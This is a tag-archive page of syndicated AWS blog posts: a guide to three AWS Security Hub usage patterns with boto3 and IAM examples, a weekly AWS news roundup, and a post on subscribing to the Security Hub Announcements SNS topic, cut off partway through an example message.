Tag Archives: AWS Security Hub

Three recurring Security Hub usage patterns and how to deploy them

Post Syndicated from Tim Holm original https://aws.amazon.com/blogs/security/three-recurring-security-hub-usage-patterns-and-how-to-deploy-them/

As Amazon Web Services (AWS) Security Solutions Architects, we get to talk to customers of all sizes and industries about how they want to improve their security posture and get visibility into their AWS resources. This blog post identifies the top three most commonly used Security Hub usage patterns and describes how you can use these to improve your strategy for identifying and managing findings.

Customers have told us they want to provide security and compliance visibility to the application owners in an AWS account or to the teams that use the account; others want a single-pane-of-glass view for their security teams; and still others want to centralize everything into a security information and event management (SIEM) system, most often because they operate in a hybrid environment.

Security Hub was launched as a posture management service that performs security checks, aggregates alerts, and enables automated remediation. Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, AWS Firewall Manager, and AWS Health, and also from third-party services. It can be integrated with AWS Organizations to provide a single dashboard where you can view findings across your organization.

Security Hub findings are normalized into the AWS Security Finding Format (ASFF) so that users can review them in a standardized format. This reduces the need for time-consuming data conversion efforts and allows for flexible, consistent filtering of findings based on the attributes provided in each finding, as well as the use of customizable responsive actions. Partners that integrate with Security Hub also send their findings to AWS in the ASFF, which enforces consistent attribute definitions and severity ratings, so findings in Security Hub carry a comparable, measurable rating. This helps reduce the complexity of managing findings from multiple providers.
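As an illustration, the following minimal Python (boto3) sketch retrieves findings and reads the same ASFF attributes regardless of which provider generated them. The filter values here are illustrative assumptions, not part of the original post.

import boto3

securityhub = boto3.client("securityhub")

# Retrieve active, critical findings; every finding uses the same ASFF shape.
response = securityhub.get_findings(
    Filters={
        "RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}],
        "SeverityLabel": [{"Value": "CRITICAL", "Comparison": "EQUALS"}],
    },
    MaxResults=100,
)

for finding in response["Findings"]:
    # ProductArn identifies the provider; Severity and Title are normalized ASFF fields.
    print(finding["ProductArn"], finding["Severity"]["Label"], finding["Title"])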

Overview of the usage patterns

In this section, we outline the objectives for each usage pattern, list the typical stakeholders we have seen these patterns support, and discuss the value of deploying each one.

Usage pattern 1: Dashboard for application owners

Use Security Hub to provide visibility to application workload owners regarding the security and compliance posture of their AWS resources.

The application owner is often responsible for the security and compliance posture of the resources they have deployed in AWS. In our experience, however, it is common for large enterprises to have a separate team responsible for defining security-related privileges and to not grant application owners the ability to modify configuration settings on the AWS account that is designated as the centralized Security Hub administration account. We’ll walk through how you can enable read-only access for application owners to use Security Hub to see the overall security posture of their AWS resources.

Stakeholders: Developers and cloud teams that are responsible for the security posture of their AWS resources. These individuals are often required to resolve security events and non-compliance findings that are captured with Security Hub.

Value adds for customers: Some organizations we have worked with put the onus on workload owners to own their security findings, because they have a better understanding of the nuances of the engineering, the business needs, and the overall risk that the security findings represent. This usage pattern gives the application owners clear visibility into the security and compliance status of their workloads in the AWS accounts so that they can define appropriate mitigation actions with consideration to their business needs and risk.

Usage pattern 2: A single pane of glass for security professionals

Use Security Hub as a single pane of glass to view, triage, and take action on AWS security and compliance findings across accounts and AWS Regions.

Security Hub generates findings by running continuous, automated security checks based on supported industry standards. Additionally, Security Hub integrates with other AWS services to collect and correlate findings and uses over 60 partner integrations to simplify and prioritize findings. With these features, security professionals can use Security Hub to manage findings across their AWS landscape.

Stakeholders: Security operations, incident responders, and threat hunters who are responsible for monitoring compliance, as well as security events.

Value adds for customers: This pattern benefits customers who don’t have a SIEM but who are looking for a centralized model of security operations. By using Security Hub and aggregating findings across Regions into a single Security Hub dashboard, they get oversight of their AWS resources without the cost and complexity of managing a SIEM.

Usage pattern 3: Centralized routing to a SIEM solution

Use AWS Security Hub as a single aggregation point for security and compliance findings across AWS accounts and Regions, and route those findings in a normalized format to a centralized SIEM or log management tool.

Customers who have an existing SIEM capability and complex environments typically deploy this usage pattern. By using Security Hub, these customers gather security and compliance-related findings across the workloads in all their accounts, ingest those into their SIEM, and investigate findings or take response and remediation actions directly within their SIEM console. This mechanism also enables customers to define use cases for threat detection and analysis in a single environment, providing a holistic view of their risk.

Stakeholders: Security operations teams, incident responders, and threat hunters. This pattern supports a centralized model of security operations, where the responsibility for monitoring and identifying both non-compliance with defined practices and security events falls to a single team within the organization.

Value adds for customers: When Security Hub aggregates the findings from workloads across accounts and Regions in a single place, those findings are normalized by using the ASFF. This means that findings are already normalized under a single format when they are sent to the SIEM. This enables faster analytics, use case definition, and dashboarding because analysts don’t have to create multi-tiered use cases for different finding structures across vendors and services.

The ASFF also enables streamlined response through security orchestration, automation, and response (SOAR) tools or AWS-native orchestration tools such as Amazon EventBridge. With the ASFF, you can parse and filter events on any attribute and customize automated responses.
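To illustrate, here is a minimal sketch of an EventBridge rule that matches imported Security Hub findings on a single ASFF attribute (severity). The rule name and target ARN are placeholders you would replace with your own, and the target must separately permit EventBridge to invoke it.

import json
import boto3

events = boto3.client("events")

# Match imported findings whose normalized severity label is HIGH or CRITICAL.
pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Imported"],
    "detail": {"findings": {"Severity": {"Label": ["HIGH", "CRITICAL"]}}},
}

events.put_rule(Name="sechub-high-critical", EventPattern=json.dumps(pattern))
events.put_targets(
    Rule="sechub-high-critical",
    # Placeholder SNS topic; its resource policy must allow events.amazonaws.com.
    Targets=[{"Id": "1", "Arn": "arn:aws:sns:us-east-1:111122223333:alerts"}],
)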

Overall, this usage pattern helps to improve the typical key performance indicators (KPIs) the SecOps function is measured against, such as Mean Time to Detect (MTTD) or Mean Time to Respond (MTTR) in the AWS environment.

Setting up each usage pattern

In this section, we’ll go over the steps for setting up each usage pattern.

Usage pattern 1: Dashboard for application owners

Use the following steps to set up a Security Hub dashboard for an account owner, where the owner can view and take action on security findings.

Prerequisites for pattern 1

This solution has the following prerequisites:

  1. Enable AWS Security Hub to check your environment against security industry standards and best practices.
  2. Next, enable the AWS service integrations for all accounts and Regions as desired. For more information, refer to Enabling all features in your organization.

Set up read-only permissions for the AWS application owner

The following steps are commonly performed by the security team or those responsible for creating AWS Identity and Access Management (IAM) policies.

  • Assign the AWS managed permission policy AWSSecurityHubReadOnlyAccess to the principal who will be assuming the role. Figure 1 shows an image of the permission statement.
    Figure 1: Assign permissions

  • (Optional) Create custom insights in Security Hub. Using custom insights can provide a view of areas of interest for an application owner; however, creating a new insight requires that the following additional permissions be granted to the application owner role or user.

    {
      "Effect": "Allow",
      "Action": [
        "securityhub:CreateInsight",
        "securityhub:UpdateInsight",
        "securityhub:DeleteInsight"
      ],
      "Resource": "*"
    }
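If you manage these permissions programmatically, the following sketch attaches the managed policy to a role; the role name is a placeholder for your own application owner role. The optional insight permissions shown above can be added to the same role as an inline or customer managed policy.

import boto3

iam = boto3.client("iam")

# Attach the AWS managed read-only policy to the application owner's role.
iam.attach_role_policy(
    RoleName="AppOwnerRole",  # placeholder role name
    PolicyArn="arn:aws:iam::aws:policy/AWSSecurityHubReadOnlyAccess",
)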

Pattern 1 walkthrough: View the application owner’s security findings

After the read-only IAM policy has been created and applied, the application owner can access Security Hub to view the dashboard, which provides the application owner with a view of the overall security posture of their AWS resources. In this section, we’ll walk through the steps that the application owner can take to quickly view and assess the compliance and security of their AWS resources.

To view the application owner’s dashboard in Security Hub

  1. Sign in to the AWS Management Console and navigate to the AWS Security Hub service page. You will be presented with a summary of your findings; depending on the security standards that are enabled, the view will be similar to the one shown in Figure 2.
    Figure 2: Summary of aggregated Security Hub standard score

    Security Hub generates its own findings by running automated and continuous checks against the rules in a set of supported security standards. On the Summary page, the Security standards card displays the security scores for each enabled standard. It also displays a consolidated security score that represents the proportion of passed controls to enabled controls across the enabled standards.

  2. Choose the hyperlink of a security standard to get an additional summarized view, as shown in Figure 3.
    Figure 3: Security Hub standards summarized view

  3. As you choose the hyperlinks for the specific findings, you will get additional details, along with recommended remediation instructions to take.
    Figure 4: Example of finding details view

  4. In the left menu of the Security Hub console, choose Findings to see the findings ranked according to severity. Choose the link text of the finding title to drill into the details and view additional information on possible remediation actions.
    Figure 5: Findings example

  5. In the left menu of the Security Hub console, choose Insights. You will be presented with a collection of related findings. Security Hub provides several managed insights to get you started with assessing your security posture. As shown in Figure 6, you can quickly see if your Amazon Simple Storage Service (Amazon S3) buckets have public write or read permissions. This is just one example of managed insights that help you quickly identify risks.
    Figure 6: Insights view

  6. You can create custom insights to track issues and resources that are specific to your environment. Note that creating custom insights requires the IAM permissions described earlier in the Set up read-only permissions for the AWS application owner section. Use the following steps to create a custom insight for compliance status; a programmatic equivalent is shown after the steps.

    To create a custom insight, use the Group By filter and select how you want your insights to be grouped together:

    1. In the left menu of the Security Hub console, choose Insights, and then choose Create insight in the upper right corner.
    2. By default, there will be filters included in the filter bar. Put the cursor in the filter bar, choose Group By, choose Compliance Status, and then choose Apply.
      Figure 7: Creating a custom insight

    3. For Insight name, enter a relevant name for your insight, and then choose Create insight. Your custom insight will be created.
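The following boto3 sketch creates an equivalent insight programmatically; the insight name and filter are illustrative assumptions.

import boto3

securityhub = boto3.client("securityhub")

# Group active findings by their compliance status, mirroring the console steps above.
securityhub.create_insight(
    Name="Active findings by compliance status",
    Filters={"RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}]},
    GroupByAttribute="ComplianceStatus",
)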

In this scenario, you learned how application owners can quickly assess the resources in an AWS account and get details about security risks and recommended remediation steps. For a more hands-on walkthrough that covers how to use Security Hub, consider spending 2–3 hours going through this AWS Security Hub workshop.

Usage pattern 2: A single pane of glass for security professionals

To use Security Hub as a centralized source of security insight, we recommend that you choose to accept security data from the available integrated AWS services and third-party products that generate findings. Check the lists of available integrations often, because AWS continues to release new services that integrate with Security Hub. Figure 8 shows the Integrations page in Security Hub, where you can find information on how to accept findings from the many integrations that are available.

Figure 8: Security Hub integrations page

Solution architecture and workflow for pattern 2

As Figure 9 shows, you can visualize Security Hub as the centralized security dashboard. Here, Security Hub can act as both the consumer and issuer of findings. Additionally, if you have security findings you want sent to Security Hub that aren’t provided by an AWS Partner or AWS service, you can create a custom provider to gain the central visibility you need.

Figure 9: Security Hub findings flow

Because Security Hub is integrated with many AWS services and partner solutions, customers get improved security visibility across their AWS landscape. With the integration of Amazon Detective, it’s convenient for security analysts to use Security Hub as the centralized starting point for incident triage. Amazon Detective is a security investigation service that you can use to analyze, investigate, and quickly identify the root cause of potential security issues or suspicious activities by automatically collecting log data from your AWS resources. To learn how to get started with Amazon Detective, we recommend watching this video.

Programmatically remediate high-volume workflows

Security teams increasingly rely on monitoring and automation to scale and keep up with the demands of their business. Using Security Hub, customers can configure automatic responses to findings based upon preconfigured rules. Security Hub gives you the option to create your own automated response and remediation solution or use the AWS provided solution, Security Hub Automated Response and Remediation (SHARR). SHARR is an extensible solution that provides predefined response and remediation actions (playbooks) based on industry compliance standards and best practices for security threats. For step-by-step instructions for setting up SHARR, refer to this blog post.
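If you build your own response automation rather than deploying SHARR, one common building block is a Security Hub custom action routed through EventBridge. The following is a minimal sketch under that assumption; the action name, Id, and rule name are placeholders.

import json
import boto3

securityhub = boto3.client("securityhub")
events = boto3.client("events")

# Create a custom action that analysts can trigger on selected findings in the console.
action = securityhub.create_action_target(
    Name="Send to remediation",
    Description="Route selected findings to a remediation workflow",
    Id="SendToRemediation",
)

# Match invocations of that custom action so a target of your choice can react.
pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Custom Action"],
    "resources": [action["ActionTargetArn"]],
}
events.put_rule(Name="sechub-custom-action", EventPattern=json.dumps(pattern))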

Routing to alerting and ticketing systems

For incidents that you cannot or do not want to remediate automatically (for example, because the incident occurred in an account with a production workload, or because a change control process must be followed), routing to an incident management environment may be necessary. The primary goal of incident response is reducing the time to resolution for critical incidents. Customers who use alerting or incident management systems can integrate Security Hub to streamline the time it takes to resolve incidents. ServiceNow ITSM, Slack, and PagerDuty are examples of products that integrate with Security Hub. This allows for workflow processing, escalations, and notifications as required.

Additionally, Incident Manager, a capability of AWS Systems Manager, also provides response plans, an escalation path, runbook automation, and active collaboration to recover from incidents. By using runbooks, customers can set up and run automation to recover from incidents. This blog post walks through setting up runbooks.

Usage pattern 3: Centralized routing to a SIEM solution

Here, we will describe how to use Splunk as an AWS Partner SIEM solution. However, note that there are many other SIEM partners available in AWS Marketplace; the instructions for routing findings to those partners’ platforms are available in their documentation.

Solution architecture and workflow for pattern 3

Figure 10: Security Hub findings ingestion to Splunk

Figure 10 shows the use of a Security Hub delegated administrator that aggregates findings across multiple accounts and Regions, as well as other AWS services such as GuardDuty, Amazon Macie, and Inspector. These findings are then sent to Splunk through a combination of Amazon EventBridge, AWS Lambda, and Amazon Kinesis Data Firehose.

Prerequisites for pattern 3

This solution has the following prerequisites:

  • Enable Security Hub in your accounts, with one account defined as the delegated admin for other accounts within AWS Organizations, and enable cross-Region aggregation.
  • Set up a third-party SIEM solution; you can visit AWS Marketplace for a list of our SIEM partners. For this walkthrough, we will be using Splunk, with the Security Hub app in Splunk and an HTTP Event Collector (HEC) with indexer acknowledgment configured.
  • Generate and deploy a CloudFormation template from Splunk’s automation, provided by Project Trumpet.
  • Enable cross-Region replication. This action can only be performed from within the delegated administrator account, or from within a standalone account that is not controlled by a delegated administrator. The aggregation Region must be a Region that is enabled by default.

Pattern 3 walkthrough: Set up centralized routing to a SIEM

To get started, first designate a Security Hub delegated administrator and configure cross-Region replication. Then you can configure integration with Splunk.

To designate a delegated administrator and configure cross-Region replication

  1. Follow the steps in Designating a Security Hub administrator account to configure the delegated administrator for Security Hub.
  2. Perform these steps to configure cross-Region replication:
    1. Sign in to the account to which you delegated Security Hub administration, and in the console, navigate to the Security Hub dashboard in your desired aggregation Region. You must have the correct permissions to access Security Hub and make this change.
    2. Choose Settings, choose Regions, and then choose Configure finding aggregation.
    3. Select the radio button that displays the Region you are currently in, and then choose Save.
    4. You will then be presented with all available Regions in which you can aggregate findings. Select the Regions you want to be part of the aggregation. You also have the option to automatically link future Regions that Security Hub becomes enabled in.
    5. Choose Save.

You have now enabled multi-Region aggregation. Navigate back to the dashboard, where findings will start to be replicated into a single view. The time it takes to replicate the findings from the Regions will vary. We recommend waiting 24 hours for the findings to be replicated into your aggregation Region.
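For teams that prefer to script this setup, the following sketch shows the API equivalents of the steps above; the account ID and Regions are placeholders.

import boto3

# From the AWS Organizations management account: designate the delegated administrator.
boto3.client("securityhub").enable_organization_admin_account(
    AdminAccountId="111122223333"  # placeholder account ID
)

# From the delegated administrator account, in the chosen aggregation Region:
# link the Regions whose findings should be aggregated there.
admin = boto3.client("securityhub", region_name="us-east-1")
admin.create_finding_aggregator(
    RegionLinkingMode="SPECIFIED_REGIONS",
    Regions=["us-west-2", "eu-west-1"],  # placeholder Regions
)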

To configure integration with Splunk

Note: These actions require that you have appropriate permissions to deploy a CloudFormation template.

  1. Navigate to https://splunktrumpet.github.io/ and enter your HEC details: the endpoint URL and HEC token. Leave Automatically generate the required HTTP Event Collector tokens on your Splunk environment unselected.
  2. Under AWS data source configuration, select only AWS CloudWatch Events, with the Security Hub findings – Imported filter applied.
  3. Download the CloudFormation template to your local machine.
  4. Sign in to the AWS Management Console in the account and Region where your Security Hub delegated administrator and Region aggregation are configured.
  5. Navigate to the CloudFormation console and choose Create stack.
  6. Choose Template is ready, and then choose Upload a template file. Upload the CloudFormation template you previously downloaded from the Splunk Trumpet page.
  7. In the CloudFormation console, on the Specify Details page, enter a name for the stack. Keep all the default settings, and then choose Next.
  8. Keep all the default settings for the stack options, and then choose Next to review.
  9. On the review page, scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgment that AWS CloudFormation might create IAM resources with custom names.

    The CloudFormation template will take approximately 15–20 minutes to complete.

Test the solution for pattern 3

If you have GuardDuty enabled in your account, you can generate sample findings. Security Hub will ingest these findings and invoke the EventBridge rule to push them into Splunk. Alternatively, you can wait for findings to be generated from the periodic checks that are performed by Security Hub. Figure 11 shows an example of findings displayed in the Security Hub dashboard in Splunk.

Figure 11: Example of the Security Hub dashboard in Splunk
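If you want to script the test, the following sketch generates GuardDuty sample findings, assuming GuardDuty is already enabled in the account and Region.

import boto3

guardduty = boto3.client("guardduty")

# Use the account's existing detector to generate sample findings.
detector_id = guardduty.list_detectors()["DetectorIds"][0]
guardduty.create_sample_findings(DetectorId=detector_id)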

Conclusion

AWS Security Hub provides multiple ways for you to quickly assess and prioritize your security alerts and security posture. In this post, you learned about three different usage patterns that we have seen our customers implement to take advantage of the benefits and integrations offered by Security Hub. Note that these usage patterns are not mutually exclusive; they can be used together as needed.

To extend these solutions further, you can enrich Security Hub metadata with additional context by using tags, as described in this post. Configure Security Hub to ingest findings from a variety of AWS Partners to provide additional visibility and context to the overall status of your security posture. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, please start a new thread on the Security Hub forum or contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Tim Holm

Tim is a Principal Solutions Architect at AWS. He joined AWS in 2018 and is deeply passionate about security, cloud services, and building innovative solutions that solve complex business problems.

Danny Cortegaca

Danny is a Senior Security Specialist at AWS. He joined AWS in 2021 and specializes in security architecture, threat modelling, and driving risk-focused conversations.

AWS Week in Review – September 5, 2022

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/aws-week-in-review-september-5-2022/

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

As a new week begins, let’s quickly look back at the most significant AWS news from the previous seven days.

Last Week’s Launches
Here are the launches that got my attention last week:

AWS announces open-sourced credentials-fetcher to simplify Microsoft AD access from Linux containers. You can find more in the What’s New post.

AWS Step Functions now has 14 new intrinsic functions that help you process data more efficiently and make it easier to perform data processing tasks such as array manipulation, JSON object manipulation, and math functions within your workflows without having to invoke downstream services or add Task states.

AWS SAM CLI esbuild support is now generally available. You can now use esbuild in the SAM CLI build workflow for your JavaScript applications.

Amazon QuickSight launches a new user interface for dataset management that replaces the existing popup dialog modal with a full-page experience, providing a clearer breakdown of dataset management categories.

AWS GameKit adds Unity support. With this release for Unity, you can integrate cloud-based game features into Win64, MacOS, Android, or iOS games from both the Unreal and Unity engines with just a few clicks.

AWS and VMware announce VMware Cloud on AWS integration with Amazon FSx for NetApp ONTAP. Read more in Veliswa’s blog post.

The AWS Region in the United Arab Emirates (UAE) is now open. More info in Marcia’s blog post.


For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
A few more blog posts you might have missed:

Easy analytics and cost-optimization with Amazon Redshift Serverless – Four different use cases of Redshift Serverless are discussed in this post.

Building cost-effective AWS Step Functions workflows – In this blog post, Ben explains the difference between Standard and Express Workflows, including costs, migrating from Standard to Express, and some interesting ways of using both together.

How to subscribe to the new Security Hub Announcements topic for Amazon SNS – You can now receive updates about new Security Hub services and features, newly supported standards and controls, and other Security Hub changes.

Deploying AWS Lambda functions using AWS Controllers for Kubernetes (ACK) – With the ACK service controller for AWS Lambda, you can provision and manage Lambda functions with kubectl and custom resources.

For AWS open-source news and updates, here’s the latest newsletter curated by Ricardo to bring you the most recent updates on open-source projects, posts, events, and more.

Upcoming AWS Events
Depending on where you are on this planet, there are many opportunities to meet and learn:

AWS Summits – Come together to connect, collaborate, and learn about AWS. Registration is open for the following in-person AWS Summits: Ottawa (September 8), New Delhi (September 9), Mexico City (September 21–22), Bogotá (October 4), and Singapore (October 6).

AWS Community Days – AWS Community Day events are community-led conferences to share and learn with one another. In September, the AWS community in the US will run events in the Bay Area, California (September 9) and Arlington, Virginia (September 30). In Europe, Community Day events will be held in October. Join us in Amersfoort, Netherlands (October 3), Warsaw, Poland (October 14), and Dresden, Germany (October 19).

That’s all from me for this week. Come back next Monday for another Week in Review!

Danilo

How to subscribe to the new Security Hub Announcements topic for Amazon SNS

Post Syndicated from Mike Saintcross original https://aws.amazon.com/blogs/security/how-to-subscribe-to-the-new-security-hub-announcements-topic-for-amazon-sns/

With AWS Security Hub you are able to manage your security posture in AWS, perform security best practice checks, aggregate alerts, and automate remediation. Now you are able to use Amazon Simple Notification Service (Amazon SNS) to subscribe to the new Security Hub Announcements topic to receive updates about new Security Hub services and features, newly supported standards and controls, and other Security Hub changes.

Introducing the Security Hub Announcements topic

Amazon SNS follows the publish/subscribe (pub/sub) messaging model, in which notifications are delivered to you by using a push mechanism that eliminates the need for you to periodically check or poll for new information and updates. You can now use this push mechanism to receive notifications about Security Hub by subscribing to the dedicated Security Hub Announcements topic.

The Security Hub Announcements topic publishes the following types of notifications:

  • General notifications
  • Upcoming standards and controls
  • New AWS Regions supported
  • New standards and controls
  • Updated standards and controls
  • Retired standards and controls
  • Updates to the AWS Security Finding Format (ASFF)
  • New integrations
  • New features
  • Changes to existing features

How to use the Security Hub Announcements topic

You can subscribe to the SNS topic for Security Hub Announcements to receive notification messages about newly released finding types, updates to the existing finding types, and other functionality changes. By subscribing to the SNS topic, you will receive Security Hub Announcements messages as soon as they are published. The notifications are available in all protocols that Amazon SNS supports, such as email and SMS. For more information about supported protocols in Amazon SNS, see Subscribing to an Amazon SNS topic.

The Security Hub Announcements topic is available in all AWS Regions in the aws and aws-cn partitions, but is not yet available in the AWS GovCloud (US) Regions (the aws-us-gov partition). Later in this post, we’ll show you how to subscribe to the Security Hub Announcements topic in a specific AWS Region by using the topic Amazon Resource Name (ARN) for that Region. The SNS topic messages are the same across Regions in a partition, so you can choose to subscribe to only one Region in a partition to avoid receiving duplicate information.

However, if you want to invoke an AWS Lambda function in reaction to a Security Hub Announcements message, you must subscribe to the topic ARN that is in the same Region as the Lambda function. The Lambda function can receive the SNS topic message payload as an input parameter and manipulate the information in the message, publish the message to other SNS topics, or send the message to other AWS services. For more information, see Subscribing a function to a topic in the Amazon SNS Developer Guide.
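As a minimal sketch, a Python Lambda handler subscribed to the topic could parse the announcement like this; the field names follow the example messages shown later in this post.

import json

def handler(event, context):
    # Each SNS record carries the announcement as a JSON string in the message body.
    for record in event["Records"]:
        announcement = json.loads(record["Sns"]["Message"])
        print(announcement["AnnouncementType"], announcement["Title"])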

The same is true if you want to subscribe an Amazon Simple Queue Service (Amazon SQS) queue to the Security Hub Announcements topic: you must use a topic ARN that is in the same Region as the SQS queue. The SQS queue can be used to persist announcement SNS topic messages for other applications to process at a later time. For more information, see Subscribing an Amazon SQS queue to an Amazon SNS topic in the Amazon SQS Developer Guide.

IAM permissions

Your user account must have sns:Subscribe AWS Identity and Access Management (IAM) permissions to subscribe to an SNS topic. For more information on IAM permissions for Amazon SNS, see Using identity-based policies with Amazon SNS.

Subscribe to the Security Hub Announcements topic

The following is the list of Security Hub Announcements topic ARNs for each currently supported Region. The examples in this post use the US West (Oregon) Region (us-west-2), but you can update the procedures with one of the following ARNs to use a different supported Region.

Security Hub Announcements topic ARNs by Region

arn:aws:sns:us-east-1:088139225913:SecurityHubAnnouncements
arn:aws:sns:us-east-2:291342846459:SecurityHubAnnouncements
arn:aws:sns:us-west-1:137690824926:SecurityHubAnnouncements
arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements
arn:aws:sns:eu-central-1:871975303681:SecurityHubAnnouncements
arn:aws:sns:eu-north-1:191971010772:SecurityHubAnnouncements
arn:aws:sns:eu-south-1:151363035580:SecurityHubAnnouncements
arn:aws:sns:eu-west-1:705756202095:SecurityHubAnnouncements
arn:aws:sns:eu-west-2:883600840440:SecurityHubAnnouncements
arn:aws:sns:eu-west-3:313420042571:SecurityHubAnnouncements
arn:aws:sns:ca-central-1:137749997395:SecurityHubAnnouncements
arn:aws:sns:sa-east-1:359811883282:SecurityHubAnnouncements
arn:aws:sns:me-south-1:585146626860:SecurityHubAnnouncements
arn:aws:sns:af-south-1:463142546776:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-1:592469075483:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-2:374299265323:SecurityHubAnnouncements
arn:aws:sns:ap-northeast-3:633550238216:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-1:512267288502:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-2:475730049140:SecurityHubAnnouncements
arn:aws:sns:ap-southeast-3:627843640627:SecurityHubAnnouncements
arn:aws:sns:ap-east-1:464812404305:SecurityHubAnnouncements
arn:aws:sns:ap-south-1:707356269775:SecurityHubAnnouncements
arn:aws-cn:sns:cn-north-1:672341567257:SecurityHubAnnouncements
arn:aws-cn:sns:cn-northwest-1:672534482217:SecurityHubAnnouncements

The two procedures that follow show you how to subscribe an email address to the Security Hub Announcements topic by using the AWS Management Console and the AWS CLI.

To subscribe an email address to the Security Hub Announcements topic (console)

  1. Sign in to the Amazon SNS console.
  2. In the Region list, choose the same Region as the topic ARN to which you want to subscribe. This example uses the us-west-2 Region.
  3. In the left navigation pane, choose Subscriptions, then choose Create subscription.
  4. In the Create subscription dialog box, do the following:
    • For Topic ARN, paste the following topic ARN for the us-west-2 Region, or use one of the ARNs listed above for a different supported Region:

      arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements

    • For Protocol, choose Email.
    • For Endpoint, enter an email address that you can use to receive the notification.
  5. Choose Create subscription.
  6. In your email application, open the message from AWS Notifications and open the link to confirm your subscription. Your web browser displays a confirmation response from Amazon SNS, similar to that shown in Figure 1.

    Figure 1: SNS notification subscription confirmation

The following steps show you how to subscribe an email address to the Security Hub Announcements topic by using the AWS Command Line Interface (AWS CLI).

To subscribe an email address to the Security Hub Announcements topic (AWS CLI)

  1. Run the following command in the AWS CLI, replacing <[email protected]> with your email address, and optionally replacing the ARN and reference to us-west-2 if you want to use a different Region:
    aws sns --region us-west-2 subscribe --topic-arn arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements --protocol email --notification-endpoint <[email protected]>
  2. In your email application, open the message from AWS Notifications and open the link to confirm your subscription.
  3. Your web browser displays a confirmation response from Amazon SNS, similar to that shown in Figure 1.

Example subscription responses

The following sections contain examples of a message announcing new standard controls supported by Security Hub in email and sqs protocol types.

Example message from an email subscription (protocol type: email)

{"AnnouncementType":"NEW_STANDARDS_CONTROLS", “Title”:”[New Controls] 36 new Security Hub controls added to the AWS Foundational Security Best Practices standard”, "Description":"We have added 36 new controls to the AWS Foundational Security Best Practices standard. These include controls for Amazon Auto Scaling (AutoScaling.3, AutoScaling.4, AutoScaling.6), AWS CloudFormation (CloudFormation.1), Amazon CloudFront (CloudFront.10), Amazon Elastic Compute Cloud (Amazon EC2) (EC2.23, EC2.24, EC2.27), Amazon Elastic Container Registry (Amazon ECR) (ECR.1, ECR.2), Amazon Elastic Container Service (Amazon ECS) (ECS.3, ECS.4, ECS.5, ECS.8, ECS.10, ECS.12), Amazon Elastic File System (Amazon EFS) (EFS.3, EFS.4), Amazon Elastic Kubernetes Service (Amazon EKS) (EKS.2), Elastic Load Balancing (ELB.12, ELB.13, ELB.14), Amazon Kinesis (Kinesis.1), AWS Network Firewall (NetworkFirewall.3, NetworkFirewall.4, NetworkFirewall.5), Amazon OpenSearch Service (Opensearch.7), Amazon Redshift (Redshift.9), Amazon Simple Storage Service (Amazon S3) (S3.13), Amazon Simple Notification Service (SNS.2), AWF WAF (WAF.2, WAF.3, WAF.4, WAF.6, WAF.7, WAF.8). If you enabled the AWS Foundational Security Best Practices standard in an account and configured Security Hub to automatically enable new controls, these controls are enabled by default. Availability of controls can vary by Region."}

Example message from an SQS queue subscription (protocol type: sqs)

The following message shows the additional metadata included with an SQS subscription to the Security Hub Announcements topic. For more information about the metadata included in an SNS topic message delivered to an SQS queue, see Fanout to Amazon SQS Queues.

{
  "Type" : "Notification",
  "MessageId" : "c9c03e46-69df-5c3c-84e9-6520708ac394",
  "TopicArn" : "arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements",
  "Message" : "{\"AnnouncementType\":\"NEW_STANDARDS_CONTROLS\",\"Title\":\"[New Controls] 36 new Security Hub controls added to the AWS Foundational Security Best Practices standard\",\"Description\":\"We have added 36 new controls to the AWS Foundational Security Best Practices standard. These include controls for Amazon Auto Scaling (AutoScaling.3, AutoScaling.4, AutoScaling.6), AWS CloudFormation (CloudFormation.1), Amazon CloudFront (CloudFront.10), Amazon Elastic Compute Cloud (Amazon EC2) (EC2.23, EC2.24, EC2.27), Amazon Elastic Container Registry (Amazon ECR) (ECR.1, ECR.2), Amazon Elastic Container Service (Amazon ECS) (ECS.3, ECS.4, ECS.5, ECS.8, ECS.10, ECS.12), Amazon Elastic File System (Amazon EFS) (EFS.3, EFS.4), Amazon Elastic Kubernetes Service (Amazon EKS) (EKS.2), Elastic Load Balancing (ELB.12, ELB.13, ELB.14), Amazon Kinesis (Kinesis.1), AWS Network Firewall (NetworkFirewall.3, NetworkFirewall.4, NetworkFirewall.5), Amazon OpenSearch Service (Opensearch.7), Amazon Redshift (Redshift.9), Amazon Simple Storage Service (Amazon S3) (S3.13), Amazon Simple Notification Service (SNS.2), AWF WAF (WAF.2, WAF.3, WAF.4, WAF.6, WAF.7, WAF.8). If you enabled the AWS Foundational Security Best Practices standard in an account and configured Security Hub to automatically enable new controls, these controls are enabled by default. Availability of controls can vary by Region. \"}",
  "Timestamp" : "2022-08-04T18:59:33.319Z",
  "SignatureVersion" : "1",
  "Signature" : "GdKokPEUexpKZn5da5u/p5eZF1cE3JUyL0uPVKmPnDzd3orkk5jJ211VsOflUFi6V9lSXF/V6RBpQN/9f3+JBFBprng7BRQwT9I4jSa1xOn1L3xKXEVGvWI6nl1oDqBl21Pj3owV+NZ+Exd2W0dpgg8B1LG4bYq5T73MjHjWGtelcBa15TpIz/+rynqanXCKCvc/50V/XZLjA5M7gU6Dzs9CULIjkdEpCsw5FvSxbtkEd6Ktx4LH7Zq6FlPKNli3EaEHRKh9uYPo6sR/yvF4RWg3E9O4dVsK7A8uTdR+pwVCU1M601KMRxO1OWF8VIdvyPINJND8Nu/70GRA2L+MRA==",
